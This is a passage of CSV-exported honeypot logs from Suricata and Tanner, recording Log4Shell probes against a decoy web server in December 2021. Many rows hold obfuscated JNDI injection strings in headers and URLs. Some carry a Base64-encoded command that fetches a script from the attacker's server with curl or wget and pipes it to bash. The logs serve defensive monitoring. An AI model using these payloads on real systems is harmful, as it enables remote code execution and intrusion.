""2021-12-15T02:27:11.822662""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","4e6a8f52-b2e2-4b06-9b31-1d8cebc48330","0.6.0",,,,,,,,,,,,,,,,,,"157.245.40.77",53580,,,,,,,,,200,,,busypie,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T02:27:11.822662",,,,,,,,,Tanner,,,"035399ad-996b-49dd-87b2-60898c1c684f",
"2021-12-15T01:02:35.580Z",1,uBCcu30B5e7x5EYn4o97,"logstash-suricata-2021.12.15",,"_doc","b55c319f-d497-4e11-a3d1-eb9acc789f3f",23609855f490,"5bfb62de-ba7c-4692-91da-a925d8909925",23609855f490,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,132060558344316,,,"Santa Clara",NA,US,US,"United States",807,"165.227.49.32","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,23609855f490,"gzip, deflate",,,,"172.16.0.42","image/png",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",3631,"HTTP/1.1",200,"/core/img/favicon-touch.png",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",29981499,,"{""timestamp"":""2021-12-15T01:02:35.580485+0000"",""flow_id"":132060558344316,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""165.227.49.32"",""src_port"":55504,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":2,""http"":{""hostname"":""172.16.0.42"",""url"":""/core/img/favicon-touch.png"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/png"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":3631}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"165.227.49.32",55504,,,,,,,,,,,,forthcomingvirtue,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T01:02:35.580485+0000",,,,,,,,2,Suricata,,,,
"2021-12-15T01:02:35.580Z",1,uRCcu30B5e7x5EYn4o97,"logstash-suricata-2021.12.15",,"_doc","b55c319f-d497-4e11-a3d1-eb9acc789f3f",23609855f490,"5bfb62de-ba7c-4692-91da-a925d8909925",23609855f490,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"165.227.49.32",55504,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/core/img/favicon-touch.png",false,"PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced",da318bff7465546a1d7ac2b31fd38967,"[]",3631,CLOSED,false,2,,,,,,,132060558344316,,,Clifton,NA,US,US,"United States",501,"172.16.0.42","40.8364","{""lon"":-74.1403,""lat"":40.8364}","-74.1403",07014,NJ,"New Jersey","America/New_York",,,,,,,,,,,,,,,23609855f490,,,,,"172.16.0.42","image/png",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",3631,"HTTP/1.1",200,"/core/img/favicon-touch.png",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",29982164,,"{""timestamp"":""2021-12-15T01:02:35.580485+0000"",""flow_id"":132060558344316,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""165.227.49.32"",""dest_port"":55504,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/core/img/favicon-touch.png"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/png"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":3631},""app_proto"":""http"",""fileinfo"":{""filename"":""/core/img/favicon-touch.png"",""sid"":[],""magic"":""PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced"",""gaps"":false,""state"":""CLOSED"",""md5"":""da318bff7465546a1d7ac2b31fd38967"",""stored"":false,""size"":3631,""tx_id"":2}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,forthcomingvirtue,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T01:02:35.580485+0000",,,,,,,,,Suricata,,,,
"2021-12-15T01:02:35.460Z",1,UnOcu30B6VkG8jKz7Foo,"logstash-tanner-2021.12.15",,"_doc","b55c319f-d497-4e11-a3d1-eb9acc789f3f",23609855f490,"5bfb62de-ba7c-4692-91da-a925d8909925",23609855f490,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"430884ca-7422-464e-b60e-ddf047d86859",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Santa Clara",NA,US,US,"United States",807,"165.227.49.32","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=430884ca-7422-464e-b60e-ddf047d86859",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",23609855f490,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",94311,,"{""method"": ""GET"", ""path"": ""/core/img/favicon-touch.png"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=430884ca-7422-464e-b60e-ddf047d86859""}, ""uuid"": ""8361430f-b18a-4dfd-adea-20303cdb7075"", ""peer"": {""ip"": ""165.227.49.32"", ""port"": 55504}, ""status"": 200, ""cookies"": {""sess_uuid"": ""430884ca-7422-464e-b60e-ddf047d86859""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""1eb4b93a-6543-48bd-8761-ba455bb47b0b""}}}, ""timestamp"": ""2021-12-15T01:02:35.460835""}",,,,,,GET,,,,,,"/core/img/favicon-touch.png",,,,,,,,,,,index,1,1,"0.6.0","1eb4b93a-6543-48bd-8761-ba455bb47b0b","0.6.0",,,,,,,,,,,,,,,,,,"165.227.49.32",55504,,,,,,,,,200,,,forthcomingvirtue,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T01:02:35.460835",,,,,,,,,Tanner,,,"8361430f-b18a-4dfd-adea-20303cdb7075",
"2021-12-15T01:02:35.425Z",1,thCcu30B5e7x5EYn4o97,"logstash-suricata-2021.12.15",,"_doc","b55c319f-d497-4e11-a3d1-eb9acc789f3f",23609855f490,"5bfb62de-ba7c-4692-91da-a925d8909925",23609855f490,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,132060558344316,,,"Santa Clara",NA,US,US,"United States",807,"165.227.49.32","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,23609855f490,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",208,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",29980031,,"{""timestamp"":""2021-12-15T01:02:35.425829+0000"",""flow_id"":132060558344316,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""165.227.49.32"",""src_port"":55504,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":208}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"165.227.49.32",55504,,,,,,,,,,,,forthcomingvirtue,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T01:02:35.425829+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T01:02:35.425Z",1,txCcu30B5e7x5EYn4o97,"logstash-suricata-2021.12.15",,"_doc","b55c319f-d497-4e11-a3d1-eb9acc789f3f",23609855f490,"5bfb62de-ba7c-4692-91da-a925d8909925",23609855f490,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"165.227.49.32",55504,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, ASCII text",838827d66cb0bd3693641815c694ca88,"[]",208,CLOSED,false,1,,,,,,,132060558344316,,,Clifton,NA,US,US,"United States",501,"172.16.0.42","40.8364","{""lon"":-74.1403,""lat"":40.8364}","-74.1403",07014,NJ,"New Jersey","America/New_York",,,,,,,,,,,,,,,23609855f490,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",208,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",29980680,,"{""timestamp"":""2021-12-15T01:02:35.425829+0000"",""flow_id"":132060558344316,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""165.227.49.32"",""dest_port"":55504,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":208},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""838827d66cb0bd3693641815c694ca88"",""stored"":false,""size"":208,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,forthcomingvirtue,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T01:02:35.425829+0000",,,,,,,,,Suricata,,,,
"2021-12-15T01:02:35.346Z",1,UXOcu30B6VkG8jKz7Foo,"logstash-tanner-2021.12.15",,"_doc","b55c319f-d497-4e11-a3d1-eb9acc789f3f",23609855f490,"5bfb62de-ba7c-4692-91da-a925d8909925",23609855f490,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"430884ca-7422-464e-b60e-ddf047d86859",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Santa Clara",NA,US,US,"United States",807,"165.227.49.32","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=430884ca-7422-464e-b60e-ddf047d86859",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",23609855f490,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",93428,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=430884ca-7422-464e-b60e-ddf047d86859""}, ""uuid"": ""8361430f-b18a-4dfd-adea-20303cdb7075"", ""peer"": {""ip"": ""165.227.49.32"", ""port"": 55504}, ""status"": 200, ""cookies"": {""sess_uuid"": ""430884ca-7422-464e-b60e-ddf047d86859""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""1eb4b93a-6543-48bd-8761-ba455bb47b0b""}}}, ""timestamp"": ""2021-12-15T01:02:35.346536""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","1eb4b93a-6543-48bd-8761-ba455bb47b0b","0.6.0",,,,,,,,,,,,,,,,,,"165.227.49.32",55504,,,,,,,,,200,,,forthcomingvirtue,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T01:02:35.346536",,,,,,,,,Tanner,,,"8361430f-b18a-4dfd-adea-20303cdb7075",
"2021-12-15T01:02:35.318Z",1,tRCcu30B5e7x5EYn4o97,"logstash-suricata-2021.12.15",,"_doc","b55c319f-d497-4e11-a3d1-eb9acc789f3f",23609855f490,"5bfb62de-ba7c-4692-91da-a925d8909925",23609855f490,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"165.227.49.32",55504,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text",ac56291293ec6186a86afc3495db6b7f,"[]",9652,CLOSED,false,0,,,,,,,132060558344316,,,Clifton,NA,US,US,"United States",501,"172.16.0.42","40.8364","{""lon"":-74.1403,""lat"":40.8364}","-74.1403",07014,NJ,"New Jersey","America/New_York",,,,,,,,,,,,,,,23609855f490,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",9652,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",29979232,,"{""timestamp"":""2021-12-15T01:02:35.318336+0000"",""flow_id"":132060558344316,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""165.227.49.32"",""dest_port"":55504,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":9652},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""ac56291293ec6186a86afc3495db6b7f"",""stored"":false,""size"":9652,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,forthcomingvirtue,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T01:02:35.318336+0000",,,,,,,,,Suricata,,,,
"2021-12-15T01:02:35.318Z",1,tBCcu30B5e7x5EYn4o97,"logstash-suricata-2021.12.15",,"_doc","b55c319f-d497-4e11-a3d1-eb9acc789f3f",23609855f490,"5bfb62de-ba7c-4692-91da-a925d8909925",23609855f490,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,132060558344316,,,"Santa Clara",NA,US,US,"United States",807,"165.227.49.32","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,23609855f490,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",9652,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",29978593,,"{""timestamp"":""2021-12-15T01:02:35.318336+0000"",""flow_id"":132060558344316,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""165.227.49.32"",""src_port"":55504,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":9652}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"165.227.49.32",55504,,,,,,,,,,,,forthcomingvirtue,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T01:02:35.318336+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T01:02:35.227Z",1,9RCcu30B5e7x5EYn7I8N,"logstash-tanner-2021.12.15",,"_doc","b55c319f-d497-4e11-a3d1-eb9acc789f3f",23609855f490,"5bfb62de-ba7c-4692-91da-a925d8909925",23609855f490,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Santa Clara",NA,US,US,"United States",807,"165.227.49.32","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",23609855f490,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",92650,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""8361430f-b18a-4dfd-adea-20303cdb7075"", ""peer"": {""ip"": ""165.227.49.32"", ""port"": 55504}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""430884ca-7422-464e-b60e-ddf047d86859""}}}, ""timestamp"": ""2021-12-15T01:02:35.227382""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","430884ca-7422-464e-b60e-ddf047d86859","0.6.0",,,,,,,,,,,,,,,,,,"165.227.49.32",55504,,,,,,,,,200,,,forthcomingvirtue,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T01:02:35.227382",,,,,,,,,Tanner,,,"8361430f-b18a-4dfd-adea-20303cdb7075",
"2021-12-14T22:05:55.128Z",1,"RHD-un0B6VkG8jKzAz9O","logstash-suricata-2021.12.14",,"_doc","893e61f7-ca52-48aa-ba33-de3b20163097",302cffd6ad72,"eebbfeb4-2928-48e1-93d8-adc0254d0f71",302cffd6ad72,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8080,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1056083422612725,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,302cffd6ad72,gzip,,,,"172.16.0.42",,GET,8080,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODA4MCl8YmFzaA==}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODA4MCl8YmFzaA==}",0,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODA4MCl8YmFzaA==}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",60184527,,"{""timestamp"":""2021-12-14T22:05:55.128080+0000"",""flow_id"":1056083422612725,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":51646,""dest_ip"":""172.16.0.42"",""dest_port"":8080,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8080,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODA4MCl8YmFzaA==}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODA4MCl8YmFzaA==}"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuMTcyLjE1MS4xMjE6ODA4MCl8YmFzaA==}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",51646,,,,,,,,,,,,distincthose,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T22:05:55.128080+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T22:04:00.789Z",1,"0qL-un0BCXMCNTQLSAKy","logstash-suricata-2021.12.14",,"_doc","972cc953-234c-40e5-a006-29b1f39630b0",e795ca8480e2,"32f1f21e-3f41-4fc7-b8a4-67c89db57c5e",e795ca8480e2,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8080,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,785238482546637,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e795ca8480e2,gzip,,,,"172.16.0.42",,GET,8080,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODA4MCl8YmFzaA==}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODA4MCl8YmFzaA==}",0,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODA4MCl8YmFzaA==}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",39007737,,"{""timestamp"":""2021-12-14T22:04:00.789121+0000"",""flow_id"":785238482546637,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":33924,""dest_ip"":""172.16.0.42"",""dest_port"":8080,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8080,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODA4MCl8YmFzaA==}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMTI4LjIyNC4xNTM6ODA4M